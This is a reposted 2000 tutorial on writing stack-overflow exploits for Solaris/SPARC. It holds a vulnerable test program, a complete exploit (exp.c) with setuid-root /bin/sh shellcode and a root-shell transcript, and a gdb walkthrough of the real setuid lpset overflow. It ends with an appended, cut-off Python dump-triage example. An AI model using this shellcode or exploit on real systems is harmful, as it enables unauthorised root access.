Poster: Lg (创造人生的传奇), Board: Linux
Subject: Writing Stack Overflow Exploits on Solaris for SPARC (1)
Site: BBS 荔园晨风站 (Wed Jun 7 18:24:20 2000), on-site mail
[The following text is reposted from the Hacker discussion board]
[Originally posted by Sealed]

Writing Stack Overflow Exploits on Solaris for SPARC (1)
Published: 2000-5-18
Content:
--------------------------------------------------------------------------------
--- Excerpted from 《绿盟月刊》 (NSFOCUS Monthly), issue 9

Writing Stack Overflow Exploits on Solaris for SPARC
Author: warning3 < warning3@hotmail.com >
Homepage: http://www.isbase.com
Date: 2000/05/05

Preface:

As everyone knows, buffer overflow vulnerabilities in Solaris keep appearing one after another, and attackers can usually exploit them quite easily to gain control of the system. Yet there seem to be very few articles on how to write overflow exploits under Solaris, so I decided to write one. It is mainly meant to get the ball rolling: if it provokes some discussion and we all learn from it, my goal is achieved. Since I have only just started studying the SPARC architecture, much of this is based on my own understanding; errors and omissions are unavoidable, and criticism and corrections are welcome.

Note: scz has already written a very good article on writing shellcode for Solaris (SPARC). It describes the shellcode-writing process in detail and also gives a very thorough introduction to the SPARC architecture. If you want to learn about writing shellcode, read that article first.

All programs in this article were tested on SunOS 5.7/5.6 Generic sun4u sparc SUNW,Ultra-5_10.

1. Basics of the SPARC platform
1.1 General-purpose registers
1.2 The procedure call mechanism
2. Writing an ordinary overflow exploit
2.1 Basic idea
2.2 Implementation
2.3 A test exploit for vul.c: exp.c
2.4 Writing a real-world exploit step by step (lpset -a)
3. Writing overflow exploits that bypass non-executable stack protection
3.1 Basic idea
3.2 A test exploit for vul.c: ex_noexec.c
3.3 Why no root shell is obtained, and how to fix it
3.4 Determining the address of the fake stack frame
3.5 A real-world example: lpset_nonexec.c
3.6 Using strcpy() to copy the shellcode
3.7 A real-world example: lpset_nonexec1.c
4. Closing remarks
5. References

Body:

1. Basics of the SPARC platform

The SPARC platform differs from Intel x86 in many ways. To understand overflows on SPARC, we first look at SPARC's registers and at how procedures execute. Space does not allow a fully detailed treatment here; interested readers can consult the relevant references.

1.1 General-purpose registers

SPARC has 4 groups of general-purpose registers, each containing 8 registers. One group is the global registers; the other three are the out, local and in registers. The basic layout and purpose of each group are shown in the following table:
          %g0       (r00)       always 0
          %g1       (r01) [1]   temporary value
          %g2       (r02) [2]
global    %g3       (r03) [2]
          %g4       (r04) [2]
          %g5       (r05)       reserved
          %g6       (r06)       reserved
          %g7       (r07)       reserved

          %o0       (r08) [3]   output parameter 0 / return value from the called function
          %o1       (r09) [1]   output parameter 1
          %o2       (r10) [1]   output parameter 2
out       %o3       (r11) [1]   output parameter 3
          %o4       (r12) [1]   output parameter 4
          %o5       (r13) [1]   output parameter 5
          %sp, %o6  (r14) [1]   stack pointer
          %o7       (r15) [1]   temporary data / address of the CALL instruction

          %l0       (r16) [3]   local 0
          %l1       (r17) [3]   local 1
          %l2       (r18) [3]   local 2
local     %l3       (r19) [3]   local 3
          %l4       (r20) [3]   local 4
          %l5       (r21) [3]   local 5
          %l6       (r22) [3]   local 6
          %l7       (r23) [3]   local 7

          %i0       (r24) [3]   input parameter 0 / value returned to the caller
          %i1       (r25) [3]   input parameter 1
          %i2       (r26) [3]   input parameter 2
in        %i3       (r27) [3]   input parameter 3
          %i4       (r28) [3]   input parameter 4
          %i5       (r29) [3]   input parameter 5
          %fp, %i6  (r30) [3]   frame pointer
          %i7       (r31) [3]   ( return address - 8 )

The out, local and in groups (24 registers) together form a "register window". A SPARC processor can contain multiple register windows. Every procedure, while it executes, corresponds to one register window, called the current window; a special register, the CWP (current window pointer), records the number of the current window. The out and in registers of each window are, respectively, the in and out registers of the adjacent windows, as shown below:

outs[1]  locals[1]  ins[1]     register window 1
outs[2]  locals[2]  ins[2]     register window 2
outs[3]  locals[3]  ins[3]     register window 3
outs[4]  ...
1.2 The procedure call mechanism

Let's start with a simple problem function that contains a buffer overflow:
--------------------------------------------------------------------------
/*
 * vul.c
 * written by warning3 <warning3@hotmail.com>
 * gcc -o vul vul.c
 */
#include <stdio.h>
#include <string.h>

void func ( char * str )
{
    char buf[8];
    strcpy( buf, str );      /* unbounded copy: overflows buf when str is 8 bytes or longer */
    printf( "%s\n", buf );
}

int main ( int argc, char * argv[] )
{
    if ( argc > 1 )
    {
        func( argv[1] );
    }
} /* end of main */
--------------------------------------------------------------------------
Let's analyze how it executes:

[warning3@sun1 ovw]$ gcc -o h vul.c
[warning3@sun1 ovw]$ gdb h
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) disass main
Dump of assembler code for function main:
0x10ad8 <main>:     save %sp, -112, %sp      ! allocate stack space, save registers l*, i*
0x10adc <main+4>:   st %i0, [ %fp + 0x44 ]   ! store parameter 1 (argc) at [%fp + 0x44]
0x10ae0 <main+8>:   st %i1, [ %fp + 0x48 ]   ! store parameter 2 (argv) at [%fp + 0x48]
0x10ae4 <main+12>:  ld [ %fp + 0x44 ], %o0   ! load argc into %o0
0x10ae8 <main+16>:  cmp %o0, 1               ! compare with 1
0x10aec <main+20>:  ble 0x10b0c <main+52>    ! if <= 1, return
0x10af0 <main+24>:  nop                      ! delay slot
0x10af4 <main+28>:  mov 4, %o0               ! %o0 = 0x4
0x10af8 <main+32>:  ld [ %fp + 0x48 ], %o2   ! put the argv pointer into %o2
0x10afc <main+36>:  add %o0, %o2, %o1        ! %o2 + 4 = &argv[1]
0x10b00 <main+40>:  ld [ %o1 ], %o0          ! load the address argv[1] into %o0
0x10b04 <main+44>:  call 0x10aa0 <func>      ! call the subroutine <func>
0x10b08 <main+48>:  nop                      ! delay slot
0x10b0c <main+52>:  ret                      ! return
0x10b10 <main+56>:  restore                  ! restore the stack
End of assembler dump.
(gdb) b *0x10ad8
Breakpoint 1 at 0x10ad8
(gdb) r aaaaaaaa
Starting program: /space/staff/warning3/ovw/h aaaaaaaa

Breakpoint 1, 0x10ad8 in main ()
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7
i0   0x0  0
i1   0x0  0
i2   0x0  0
i3   0x0  0
i4   0x0  0
i5   0x0  0
fp   0x0  0
i7   0x0  0
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7
o0   0x2         2           <----- first argument: argc = 2
o1   0xffbefc4c  -4260788    <----- second argument: the argv pointer
o2   0xffbefc58  -4260776    <----- environment pointer
o3   0x21998     137624      <----- pointer to the environment pointer: **environ
o4   0x0         0
o5   0x0         0
sp   0xffbefbe8  -4260888    <----- current stack pointer
o7   0x109bc     68028       <----- address of the instruction that called main: call 0x10ad8 <main>
(gdb) x/x $o1
0xffbefc4c: 0xffbefd40
(gdb) x/s 0xffbefd40
0xffbefd40: "/space/staff/warning3/ovw/h"     <---- argv[0]
(gdb) x/x $o1 + 4
0xffbefc50: 0xffbefd5c
(gdb) x/s 0xffbefd5c
0xffbefd5c: "aaaaaaaa"                         <---- argv[1]
(gdb) x/x $o2
0xffbefc58: 0xffbefd65                         <---- start address of the environment strings
(gdb) x/5s 0xffbefd65
0xffbefd65: "PWD=/space/staff/warning3/ovw"
0xffbefd83: "TZ=PRC"
0xffbefd8a: "_INIT_RUN_NPREV=0"
0xffbefd9c: "HZ=100"
0xffbefda3: "HOSTNAME=sun1.isbase.com"
(gdb) x/x $o3
0x21998 <environ>: 0xffbefc58                  <---- points to the address held in %o2
(gdb) si                                       <---- execute: save %sp, -112, %sp
0x10adc in main ()                                   (sets up the stack frame for main())
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7              <---- the whole out group has become the in group
i0   0x2         2
i1   0xffbefc4c  -4260788
i2   0xffbefc58  -4260776
i3   0x21998     137624
i4   0x0         0
i5   0x0         0
fp   0xffbefbe8  -4260888    <---- the old %sp has become %fp
i7   0x109bc     68028
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7              <---- a new out group is created
o0   0x0         0
o1   0x0         0
o2   0x0         0
o3   0x0         0
o4   0x0         0
o5   0x0         0
sp   0xffbefb78  -4261000    <---- new sp (o6) = old sp - 112 (0x70)
o7   0x0         0
At this point the save instruction has computed the length of the function's stack frame as 112 bytes, so it moves the current stack pointer down by 112 bytes, leaving room for the saved registers and for local variables; %sp now points to the start of the frame.

(gdb) x/8xw $sp                                <---- l0 - l7 are saved at the low end, at $sp
0xffbefb78:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefb88:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw $sp + 32                           <---- i0 - i7 are saved at $sp+32
0xffbefb98:     0x00000002      0xffbefc4c      0xffbefc58      0x00021998
0xffbefba8:     0x00000000      0x00000000      0xffbefbe8      0x000109bc
                                                                ^-- (return address - 8)

Note that the values of l0-l7 and i0-i7 are saved at the start of main()'s stack frame, and the value saved for i7 is the address of the call <main> instruction, i.e. (return address - 8).

(gdb) x/2x $fp + 0x44
0xffbefc2c:     0x00000000      0x00000000
(gdb) si                                       <---- st %i0, [ %fp + 0x44 ]
0x10ae0 in main ()
(gdb) x/2x $fp + 0x44                          <---- parameter 1 (argc) has been stored at [ %fp + 0x44 ]
0xffbefc2c:     0x00000002      0x00000000
(gdb) si                                       <---- st %i1, [ %fp + 0x48 ]
0x10ae4 in main ()
(gdb) x/2x $fp + 0x44                          <---- the address of parameter 2 (**argv) has been stored at [ %fp + 0x48 ]
0xffbefc2c:     0x00000002      0xffbefc4c

We can see something interesting here: main() places its parameters at addresses starting from %fp + 0x44. 0x44 = 68 = (8 + 8 + 1) * 4. %fp is actually the stack pointer from before main was called, i.e. the stack pointer of <_start>: %fp holds the saved l0-l7, %fp + 32 holds the saved i0-i7, %fp + 64 (4 bytes) is reserved for main()'s return value, and %fp + 68 onwards is used to hold main()'s parameters. In other words: under Solaris, a callee's parameters are stored in the caller's stack frame.
(gdb) b *0x10b00                               <---- skip the instructions in between, nothing special there
Breakpoint 2 at 0x10b00
(gdb) c
Continuing.

Breakpoint 2, 0x10b00 in main ()
(gdb) i r o0
o0   0x4  4
(gdb) si                                       <---- pass the address of "aaaaaaaa" to %o0
0x10b04 in main ()                             <---- the next instruction is at 0x10b04
(gdb) x/s $o0
0xffbefd5c: "aaaaaaaa"
(gdb) i r o7
o7   0x0  0                                    <---- o7 is 0 for now
(gdb) si                                       <---- execute the call <func>
0x10b08 in main ()
(gdb) i r o7
o7   0x10b04  68356                            <---- o7 is now 0x10b04: the address of call <func>
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7
o0   0xffbefd5c  -4260516
o1   0xffbefc50  -4260784
o2   0xffbefc4c  -4260788
o3   0x0         0
o4   0x0         0
o5   0x0         0
sp   0xffbefb78  -4261000
o7   0x10b04     68356
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7
i0   0x2         2
i1   0xffbefc4c  -4260788
i2   0xffbefc58  -4260776
i3   0x21998     137624
i4   0x0         0
i5   0x0         0
fp   0xffbefbe8  -4260888
i7   0x109bc     68028
(gdb) i r pc
pc   0x10b08  68360
(gdb) si                                       <---- execute the delay-slot instruction
0x10aa0 in func ()
(gdb) i r pc                                   <---- %pc now points to the start of <func>
pc   0x10aa0  68256
(gdb) si                                       <---- execute save %sp, -120, %sp
0x10aa4 in func ()
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7              <---- a new out group is created
o0   0x0         0
o1   0x0         0
o2   0x0         0
o3   0x0         0
o4   0x0         0
o5   0x0         0
sp   0xffbefb00  -4261120    <---- sp now points to sp - 120
o7   0x0         0
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7              <---- out has become in
i0   0xffbefd5c  -4260516
i1   0xffbefc50  -4260784
i2   0xffbefc4c  -4260788
i3   0x0         0
i4   0x0         0
i5   0x0         0
fp   0xffbefb78  -4261000    <---- main()'s stack pointer has become %fp
i7   0x10b04     68356       <---- func()'s return address - 8
(gdb) disass func
Dump of assembler code for function func:
0x10aa0 <func>: save %sp, -120, %sp
0x10aa4 <func+4>: st %i0, [ %fp + 0x44 ]
0x10aa8 <func+8>: add %fp, -24, %o1
0x10aac <func+12>: mov %o1, %o0
0x10ab0 <func+16>: ld [ %fp + 0x44 ], %o1
0x10ab4 <func+20>: call 0x216f0 <strcpy>
0x10ab8 <func+24>: nop
0x10abc <func+28>: add %fp, -24, %o1
0x10ac0 <func+32>: sethi %hi(0x11400), %o2
0x10ac4 <func+36>: or %o2, 0x268, %o0 ! 0x11668 <_lib_version+8>
0x10ac8 <func+40>: call 0x216fc <printf>
0x10acc <func+44>: nop
0x10ad0 <func+48>: ret
0x10ad4 <func+52>: restore
End of assembler dump.
From this we can see the basic flow of a SPARC function call:

   caller                        callee
   ------                        ------
   main
    *
    *
   call func
   nop  -------\
                |
                \---> func:  save %sp, -framesize, %sp
                              *
                              *
                              *
                              *
                             ret
                             restore
                              |
    * <-----------------------/
    *
    *
    *

A brief description of the four commonly used instructions:

<1> call: saves the address of the call instruction itself into register %o7, then transfers control to func(). The nop after the call is a delay-slot operation. When func() returns (ret), execution should resume at the address after the nop (%o7+8); hence the value held in %o7 is the return address - 8.

<2> save performs the following operations:
    1. Computes the stack frame size of this procedure and, from the caller's %sp (%o6), computes the new address of the current stack pointer.
    2. Decrements the register window number by one.
    3. Renames the old "out" registers to "in". This way the caller main's stack pointer (%sp/%o6) is preserved in (%fp/%i6), and func()'s return address is preserved in %i7.
    4. save then creates new "out" and "local" register groups and stores the address of the current stack (%sp) into %o6 (note: this is the callee's %o6).
    5. %l0-%l7 are saved at (%sp) and %i0-%i7 are saved at (%sp+32).

<3> ret is a synthetic instruction equivalent to jmpl %i7+8, %g0: it jumps to %i7+8. Since the value held in %i7 is the address of the call instruction, the program jumps to the correct address (skipping the delay-slot NOP after the call) and continues executing there.

<4> restore is also a synthetic instruction. It increments the register window number by one, renames the "in" register group to "out", and restores the caller's %i0-%i7 (saved from %fp+32) and %l0-%l7 (saved from %fp) from the stack into the new "in" and "local" register groups. In this way main()'s three register groups are restored to their original state.
Let's now look at how memory is laid out on the stack during a procedure call:

Stack of the called procedure (after the save instruction has executed)
================================================
low addresses

             ___________  ___________ %sp ( func() )
  %sp       | %l0-%l7   |  8*4  saved %l0-%l7 of func()
            |___________|
  %sp+32    | %i0-%i7   |  8*4  saved %i0-%i7 of func() (%i7 contains func()'s return address)
            |___________|
  %sp+64    |ret val ptr|  1*4  return-value address slot reserved for the next callee
            |___________|
  %sp+68    | arg area  |  6*4  space reserved for the (first 6) arguments of the next callee
            |___________|
  %sp+92    | arg area  |  n*4  n>=1: if the next callee has more than 6 arguments, the extra ones are allocated here
            |___________|
            | locals    |
            |  ....     |  n*8  space for func()'s local variables, allocated in 8-byte units
            |           |
            |___________|
            | temp area |  4*4  area the C compiler uses to hold temporaries while evaluating expressions
            |___________|___________ %fp ( main() )
  %fp       | %l0-%l7   |  8*4  saved %l0-%l7 of main()
            |___________|
  %fp+32    | %i0-%i7   |  8*4  saved %i0-%i7 of main() (%i7 contains main()'s return address)
            |___________|
  %fp+64    |ret val ptr|  1*4  return-value address slot reserved for the next callee (here func())
            |___________|
  %fp+68    | arg area  |  6*4  space reserved for the first 6 arguments of the next callee (here func())
            |___________|
  %fp+92    | arg area  |  n*4  n>=1: if the next callee has more than 6 arguments, the extra ones are allocated here
            |___________|
            | locals    |
            |  ....     |  n*8  space for main()'s local variables, in 8-byte units
            |           |
            |___________|
            | reserved  |  4*4  four-word reserved area
            |___________|
            | %l0-%l7   |
            |___________|
               ....
high addresses
2. Writing an ordinary overflow exploit

2.1 Basic idea

From the function call process described above we know that we cannot overwrite the current function's return address, because it is held in register %i7. What we can overwrite is the stack frame of the current function's caller, i.e. the region from %fp upwards, where the caller's %l0-%l7 and %i0-%i7 are saved.

Taking the program above as an example, supplying (n*8 + 4*4 + 8*4 + 8*4) bytes of input is enough to completely overwrite main()'s saved %l0-%l7 and %i0-%i7. Then, when func() executes its restore instruction, our modified stack contents are loaded back into the in and local registers, and when main() executes ret to return, it jumps to the address (%i7+8). All we need is to have placed our shellcode at that address beforehand.

Therefore, on the SPARC platform we need at least two returns to complete the attack, which is different from i386. It also means that an overflow located in main() itself cannot be attacked successfully: after main() returns, <_start> normally calls <exit> or <_exit> to terminate, so there is no further chance to modify register %i7 and jump to it. For example, a program like the following cannot be attacked with an overflow; interested readers can try it.

/* vul1.c */
#include <string.h>

int main(int argc, char **argv)
{
    char buf[8];
    strcpy(buf, argv[1]);   /* the overflow is in main() itself, so there is no second return */
}
/* end of vul1.c */
2.2 Implementation

Once the function call process above is understood, writing the exploit is actually very similar to Linux: simply overwrite the saved %i7 with the return address, as sketched below:

  addresses -----------------------------> high
              %fp                   %fp+32
  -------------------------------------------
  | buffer | reserved | %l0-%l7 | %i0 - %i7 |
  --------------------------------------------
  | NOPNOP...SHELLCODE| RET ... RET |
  --------------------------------------------
        ^                    |
        |                    |
        \--------------------/

For writing shellcode on the SPARC platform, see scz's 《solaris for sparc下shellcode的编写》; it is not repeated here.

If the buffer is too small to hold our shellcode, there are two ways around it:

The first is to move the "NOP...NOP..SHELLCODE" part after the "RET...":

  addresses -----------------------------> high
              %fp                   %fp+32
  ----------------------------------------------------------------
  | buffer | reserved | %l0-%l7 | %i0 - %i7 |       .....        |
  ----------------------------------------------------------------
  | RET ... RET ... RET             | NOPNOP...SHELLCODE         |
  ----------------------------------------------------------------
     |                                   ^
     |                                   |
     \-----------------------------------/

The second is to put the shellcode in an environment variable and point RET at the environment variable:

  addresses -----------------------------> high
              %fp                   %fp+32                 environ
  -------------------------------------------   ---------------------
  | buffer | reserved | %l0-%l7 | %i0 - %i7 |   |       .....       |
  -------------------------------------------   ---------------------
  | RET ... RET ... RET             |           | NOPNOP...SHELLCODE |
  -------------------------------------------   ---------------------
     |                                                   ^
     |                                                   |
     \---------------------------------------------------/

Either method works in theory. Here I give only one example, using an environment variable to hold our shellcode. Points to note:

(1) The NOP here is a 4-byte instruction, which requires our return address to point exactly at the first byte of a NOP instruction (on i386 a NOP is one byte, so the requirement is not this strict).
(2) The start address of the NOP instructions must lie on a 4-byte boundary (divisible by four), otherwise a bus error results.
(3) On SPARC, the size of a buffer on the stack is allocated in multiples of 8; keep this in mind when determining the buffer size.
2.3 A test exploit for vul.c: exp.c

Below is a test program that attacks our earlier vul.c. We use execle() to run ./vul so that our environment is as small as possible; our shellcode then sits near the top of the stack, where its address is relatively fixed and easy to guess. Adjust offset (which must be a multiple of 4) so that the return address lands inside the NOP instructions; if that address is not aligned with the first byte of a NOP, adjust align (0-3) until it is.
--------------------------------------------------------------------------
/*
 * exp.c -- test exploit for vul.c in Solaris for SPARC .
 * gcc -o exp exp.c
 * by warning3 <warning3@hotmail.com>
 * y2k/5/5
 */
#include <stdio.h>
#include <stdlib.h>      /* malloc(), atoi(), exit() */
#include <string.h>      /* memset(), memcpy(), strlen() */
#include <unistd.h>      /* execle() */

#define BUFSIZE 8               /* the size of overflowed buffer */
#define EGGSIZE 1024            /* the egg buffer size */
#define NOP 0xaa1d4015          /* "xor %l5, %l5, %l5" */
#define ALIGN 0                 /* If it doesn't work, try adjusting align to 0,1,2,3 */
#define OFFSET 1500

char shellcode[] =              /* from scz's funny shellcode for SPARC */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"      /* setuid(0) */
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack pointer address to guess the return address;
   %i0 becomes the caller's %o0 (the return value) after restore */
long get_esp(void)
{
    __asm__("mov %sp,%i0");
}

int main( int argc, char **argv )
{
    char *pattern, eggbuf[EGGSIZE + 1], *env[2];   /* +1: room for a terminating NUL */
    long retaddr, i;
    long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize;
    long *addrptr;

    if( argc > 1 ) align = atoi(argv[1]);
    if( argc > 2 ) offset = atoi(argv[2]);
    if( argc > 3 ) bufsize = atoi(argv[3]);

    retaddr = get_esp() + offset;           /* Guess return address */

    printf("Usages: %s <align> <offset> <bufsize> \n\n", argv[0] );
    printf("Using RET address = 0x%lx ,Bufsize = %ld, Offset = %ld, Align= %ld\n",
           retaddr, bufsize, offset, align );

    /* bufsize + reserved area + saved in/local + NULL */
    patternsize = bufsize + 4*4 + 16*4 + 1;
    if((pattern = (char *)malloc(patternsize)) == NULL) {
        printf("Can't get enough memory!\n");
        exit(-1);
    }
    memset(pattern, 'C', patternsize );     /* fill pattern buffer with garbage */
    pattern[patternsize - 1] = '\0';        /* the NULL the comment above reserves room for */

    addrptr = (long *) (pattern + bufsize + 4*4 );  /* move to saved %l0 */
    /* Let's overwrite caller function's saved stack frame */
    for( i = 0 ; i < 16 ; i ++ )
        *addrptr++ = retaddr;               /* saved (%l0-%l7),(%i0-%i7) */

    /* construct shellcode buffer */
    memset(eggbuf,'A',EGGSIZE);             /* fill the eggbuf with garbage */
    for (i = align; i + 3 < EGGSIZE; i += 4) {   /* fill with NOP, never past the end */
        eggbuf[i+3]=NOP & 0xff;
        eggbuf[i+2]=(NOP >> 8 ) &0xff;
        eggbuf[i+1]=(NOP >> 16 ) &0xff;
        eggbuf[i+0]=(NOP >> 24 ) &0xff;     /* Big endian */
    }
    /* Notice : we assume the length of shellcode can be divided exactly by 4.
       If not, exploit will fail. Anyway, our shellcode is. ;-) */
    memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode,
           strlen(shellcode));
    memcpy(eggbuf,"EGG=",4);                /* Now : EGG=NOP...NOPSHELLCODE */
    eggbuf[EGGSIZE] = '\0';                 /* terminate the environment string */
    env[0] = eggbuf;                        /* put eggbuf in env */
    env[1] = NULL;                          /* end of env */

    execle("./vul", "./vul", pattern, NULL, env);
    return 1;                               /* only reached if execle() fails */
} /* end of main */
--------------------------------------------------------------------------
Let's test it:
[warning3@sun1 test]$ ls -l vul exp
-rwxr-xr-x 1 root other 25664 May 5 10:17 exp
-rwsr-xr-x 1 root other 24576 May 4 23:25 vul
[warning3@sun1 test]$ id
uid=100(warning3) gid=1(other)
[warning3@sun1 test]$ ./exp
Usages: ./exp <align> <offset> <bufsize>
Using RET address = 0xffbefe0c ,Bufsize = 8, Offset = 1500, Align= 0
CCCCCCCCCCCCCCCCCCCCCCCCÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
C
# id
uid=0(root) gid=1(other)                <---- success!
#
2.4 Writing a real-world exploit step by step (lpset_sparc.c)

Now we use a real example to describe in detail how to write an exploit. Under Solaris, lpset is installed setuid, and when its "-a" switch is given a very long argument it overflows. (This vulnerability was discovered by the Japanese security group The Shadow Penguin Security.)

First let's look at man lpset:

NAME
     lpset - set printing configuration in /etc/printers.conf or FNS
SYNOPSIS
     lpset [-n system | fns ] [ -x ] [ -a key=value ] [ -d key ] destination
...

We see that the argument to "-a" must contain an "=" sign, otherwise it does not work properly.

Let's test it:

[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x800'` blah
write operation failed                         <----- no overflow
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x1024'` blah
总线错误 (core dumped)                          <----- OK, the overflow happened (总线错误 = Bus Error)
[root@ /test]> gdb /usr/bin/lpset core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
<...output omitted...>
(no debugging symbols found)...done.
#0 0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
(gdb) bt
#0 0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
Cannot access memory at address 0x41414179.
(gdb) i r
<.....>
o0 0x100 256
o1 0xff38a698 -13064552
o2 0x27fa8 163752
o3 0xff3784d0 -13138736
o4 0x100 256
o5 0xff3770c4 -13143868
sp 0xffbef6d0 -4262192     <--- current stack pointer
o7 0xff3770c4 -13143868
l0 0x41414141 1094795585   <--- both local and in have been restored with the data we
l1 0x41414141 1094795585        supplied as filler, 0x41414141
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585
<.....>
pc 0xff3770cc -13143860    <--- let's see what the program does next
npc 0xff3770d0 -13143856
<.....>
(gdb) disass 0xff3770cc
<.....>
0xff3770c4 <ns_printer_put+76>: call %o1
0xff3770c8 <ns_printer_put+80>: mov %i0, %o0
0xff3770cc <ns_printer_put+84>: ret                <--- about to return
0xff3770d0 <ns_printer_put+88>: restore %g0, %o0, %o0
0xff3770d4 <ns_printer_put+92>: mov -1, %i0
0xff3770d8 <ns_printer_put+96>: ret
0xff3770dc <ns_printer_put+100>: restore
End of assembler dump.
(gdb) x/32x $sp
0xffbef6d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef6e0:     0x41414141      0x41414141      0x41414141      0x41414141  <-- %l0-%l7
0xffbef6f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef700:     0x41414141      0x41414141      0x41414141      0x41414141  <-- %i0-%i7
0xffbef710:     0x41412220      0x3e2f6465      0x762f6e75      0x6c6c2032
                  ----
                    \--- two extra bytes
0xffbef720:     0x3e263100      0x00000001      0x00ff0000      0x00011100
0xffbef730:     0x78666e5f      0x7075745f      0x7072696e      0x74657200
0xffbef740:     0x00000000      0xff31e128      0xffbef750      0x00000000

Clearly the program faulted when executing ret/restore after returning from call %o1, and by then %i0-%i7 and %l0-%l7 had already been restored with the data we supplied. From this alone we can estimate the bufsize we need: bufsize = (1024 + 2) - 2 - 8*8 - 4*4 = 944 bytes.

Still, it is better to confirm this. Let's look on the stack for the frame of the function containing "call %o1": since the argument we supplied is already 1026 bytes long, we examine what lies before the current %sp-1200:

(gdb) x/1000x $sp-1200
0xffbef240:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef250:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef260:     0x7ffffbac      0xffbef723      0xff3375e0      0xff3375d8
0xffbef270:     0x41414141      0x2200cd08      0xff000000      0x00ff0000
                  \--------- start of the previous callee's stack frame
0xffbef280:     0x0000ff00      0x01010100      0x00000000      0x00000000  <-- %l0-%l7
0xffbef290:     0x000252c0      0xff38a698      0x00027fa8      0xff3784d0
0xffbef2a0:     0x00000100      0xff3770c4      0xffbef6d0      0xff3770c4  <-- %i0-%i7
                                                  \---------- our current stack pointer
0xffbef2b0:     0x000229d0      0xffbef2d0      0x00000000      0xff38b630
0xffbef2c0:     0xff38b64c      0x00026220      0x00027fa8      0x00000002  <-- argument area
0xffbef2d0:     0x2f757372      0x2f62696e      0x2f666e63      0x72656174
                  \---------- start of the local variables
0xffbef2e0:     0x655f7072      0x696e7465      0x72202d73      0x20746869
0xffbef2f0:     0x736f7267      0x756e6974      0x2f736572      0x76696365
0xffbef300:     0x2f707269      0x6e746572      0x20626c61      0x68202022
0xffbef310:     0x413d4141      0x41414141      0x41414141      0x41414141
                  \---------- start of the argument we supplied
<......>

We easily find the position of the previous callee's stack frame (0xffbef270); the local variables start at 0xffbef2d0, and the argument we supplied was placed at 0xffbef310. Let's look more closely:

(gdb) x/10s 0xffbef2d0
0xffbef2d0: "/usr/bin/fncreate_printer -s thisorgunit/service/printer blah \"A=", 'A' <repeats 134 times>...
0xffbef398: 'A' <repeats 200 times>...
0xffbef460: 'A' <repeats 200 times>...
0xffbef528: 'A' <repeats 200 times>...
0xffbef5f0: 'A' <repeats 200 times>...
0xffbef6b8: 'A' <repeats 90 times>, "\" >/dev/null 2>&1"
0xffbef724: ""
0xffbef725: ""
0xffbef726: ""
0xffbef727: "\001"

Now we can get the exact bufsize: bufsize = (0xffbef6d0 - 0xffbef310) - 4*4 = 944, which agrees with the earlier estimate. One more thing to note:

"blah" is the printer name we supplied, and it is placed in front of "\"A=AA...A\"". If the length of the printer name changes, the whole "\"A=AA...A\"" shifts towards higher addresses, so the actual number of padding bytes depends on the length of the printer name. Actual padding length = 944 + 4 ("blah" is 4 bytes long) - strlen(printer).
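As an added example (not code from warning3's article), the check an analyst would run when triaging a core file like the one above: it parses gdb `x/Nx` output, recovers the saved window using the layout from section 1.2 (%l0-%l7 at %sp, %i0-%i7 at %sp+32, return address = saved %i7 + 8), flags saved registers that hold a repeated fill byte, and recomputes the bufsize derivation just given (frame %sp minus the start of the supplied string, minus the 4*4 reserved area). The sample dump is re-typed from the `x/32x $sp` output above; the function and variable names are my own.

```python
"""SPARC saved-window triage for a gdb memory dump (added example, not from the article)."""
import re

# One gdb "x/Nx" output line: "0xffbef6d0: 0x41414141 0x41414141 ..." (an optional <symbol> may follow the address).
LINE_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+)\s*(?:<[^>]*>)?:\s*((?:0x[0-9a-fA-F]{8}\s*)+)")

# Constructed sample: the "x/32x $sp" lines from the lpset core dump above, re-typed.
SAMPLE_DUMP = """\
0xffbef6d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef6e0: 0x41414141 0x41414141 0x41414141 0x41414141
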